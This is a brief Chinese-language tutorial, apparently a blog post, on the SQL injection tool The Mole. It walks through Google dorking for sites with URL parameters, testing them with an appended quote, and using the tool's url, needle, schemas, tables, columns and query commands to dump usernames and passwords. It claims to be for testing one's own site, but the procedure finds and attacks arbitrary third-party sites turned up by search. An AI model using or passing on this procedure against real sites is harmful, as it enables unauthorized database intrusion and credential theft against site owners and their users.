The Mole软件特点:
开源的,
只需提供一个URL和一个可用的关键字,它就能够检测注入点并利用,
攻击范围包括SQL Server、MySQL、Postgres和Oracle数据库。
总之,是一个比较好的工具,用于测试自己的网站,弥补漏洞。
使用方法:
首先下载:
https://sourceforge.net/projects/themole/
运行exe:
Google 找网站, “aaa?bb=”,加inurl参数更好。如:
找到个网站:
http://www.xxx.com/product.php?id=200
后面加个 ’ 号,先简单测试下,即:
http://www.xxx.com/product.php?id=200’
输入浏览器
输出错误error,就有可能有注入漏洞。否则继续google下一个
The Mole里输入:
url http://www.xxx.com/product.php?id=200
找到这个目标网站每页都有的词做needle用:如:Products
The Mole里输入:
needle Products
再输入:
schemas
回车,然后等。。。。。。
找到漏洞后,输入tables xxx-database, 可以得到表名。
要查询数据库中的数据,如用户名和密码,输入:
columns xxx-database xxx-table
query xxx-database xxx-table col1, col2, col3
用户名、密码等都出来了。
以上技巧可用于测试自己的网站,弥补漏洞。
欢迎访问:www.uncle-yong.com